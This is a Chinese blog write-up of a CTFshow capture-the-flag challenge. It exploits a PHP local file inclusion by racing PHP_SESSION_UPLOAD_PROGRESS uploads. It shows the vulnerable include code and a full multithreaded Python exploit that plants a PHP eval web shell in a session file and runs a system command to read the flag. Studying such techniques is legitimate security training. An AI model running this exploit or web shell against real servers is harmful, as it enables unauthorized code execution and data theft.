[CTFSHOW]利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含

最新推荐文章于 2024-07-05 16:48:58 发布
最新推荐文章于 2024-07-05 16:48:58 发布
阅读量2.2k 收藏 3
点赞数 3
分类专栏: 安全学习 # 训练打卡日记 # Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/109460211
版权
安全学习 同时被 3 个专栏收录
210 篇文章 84 订阅
订阅专栏
Web
94 篇文章 21 订阅
订阅专栏
训练打卡日记
66 篇文章 6 订阅
订阅专栏

文章目录

代码审计

考点是:利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含
通过观察代码,可以看到过滤了大部分的文件包含函数,这里我们利用PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含,具体原理可以看看下面这篇参考文章

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

脚本

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat fl0g.php');"}
url = "http://6832d07b-9f5d-445f-aee4-40905b7ed00d.chall.ctf.show/"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_' + sessid,
                            data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

参考文章

利用session.upload_progress进行文件包含和反序列化渗透

Y4tacker
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 2022
利用session.upload_progress进行文件包含
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 700
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
php-session文件包含和反序列化(对session.upload_progress利用)
unexpectedthing的博客
02-11 1677
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
ctfshow-web入门-文件包含(web82-web86)条件竞争实现session会话文件包含
最新发布
Welcome To Myon'Blog !
07-05 1570
file_get_contents 函数将会读取文件的全部内容并将其作为字符串返回,strpos($content, "
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 934
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 483
利用session.upload_progress进行文件包含
ctfshow——文件包含
qq_55202378的博客
02-03 861
这里不知道的文件路径,可以考虑使用尝试执行php语句,获取文件路径。 可能读取不了文件,这时候试试。linux 命令是倒序读取文件,也就是从最后一行往前读取文件。数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。用法: 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。php伪协议总结: 首先,根据php特性,无法迭代过滤,只过滤一次。此处,如果用替换,可以直接使用双写进行绕过。 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。既
ctfshow web150_plus
qq_59970501的博客
10-21 684
web150_plus 源码 include("flag.php"); error_reporting(0); highlight_file(__FILE__); ​ class CTFSHOW{ private $username; private $password; private $vip; private $secret; ​ function __construct(){ $this->vip = 0; $thi...
CTFshow 反序列化 web263
Kradress的博客
12-20 1270
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: phpsession存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
ctfshow 原谅杯
qq_45655564的博客
09-09 695
原谅4 这是提示。 老前辈说过“最安全的系统就是什么都没有”,我把没用的命令都删了,看你还怎么执行 你知道系统环境变量里的PATH是干什么的吗? 查看phpinfo发现禁用了很多东西,根据提示,查看$PATH echo $PATH 然后到各路径下查看 然后查看/bin 发现只有三个命令,ls rm sh 所以这里我们可以执行shell脚本 echo -e "%23!/bin/sh\nwhile read LINE\ndo\necho \$LINE\ndone < /flag" > readfl
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2336
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
[ctf web][NPUCTF2020]ezinclude + (session对话[session.upload_progress]文件包含 + php7 segment fault特性)
ShenZ的博客
09-09 998
知识点 利用session对话[session.upload_progress]进行文件包含 利用session对话session.upload_progress条件竞争将命令写入session文件,然后包含这个session文件,执行php命令 当session.use_strict_mode为on,我们可以自己设置Cookie:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag”。 在Linux系统中,session文件一般的默认存储位置为 /tmp 或 /va
php通过session实现upload_progress
prape's world!
01-07 1155
php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用phpsessionPHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
[NPUCTF2020]ezinclude php segment fault特性 PHP_SESSION_UPLOAD_PROGRESS文件包含
scrawman的博客
11-25 445
[NPUCTF2020]ezinclude 如果什么都没传会返回这个Hash值,猜测是name为空时pass的值 整挺好,跳出来了flflflflag.php 因为直接访问会跳到404页面所以还是得抓包 先用filter伪协议读取源文件:/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php 返回的是base64编码过的,解码过后得到源码: <html> <head> <
LFI 绕过 Session 包含限制 Getshell
qq_45521281的博客
06-10 1414
文章目录前言用户会话会话存储会话处理LFI SessionSession Base64EncodeBypass serialize_handler=phpBypass serialize_handler=php_serializeNo session_start()表单利用攻击Conclusion session文件包含漏洞就是在用户可以控制session文件中的一部分信息,然后将这部分信息变成我们的精心构造的恶意代码,之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。 前言 之
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 645
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
session.upload_progress.enabled开启的问题
weixin_30539835的博客
06-26 552
exp.php的内容,存在文件包含 <?php include($_GET['lfi']); $key = ini_get("session.upload_progress.prefix") . $_POST[ini_get("session.upload_progress.name")]; var_dump($_SESSION); var_dump($key...
详解PHP session_set_save_handler函数与MySQL应用
1. `open($save_path, $session_name)`:在执行`session_start()`时被调用,用于打开并创建存储路径,但在这个例子中,由于使用的是数据库,所以实际上不需要处理物理文件路径,而是通过数据库连接初始化操作。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值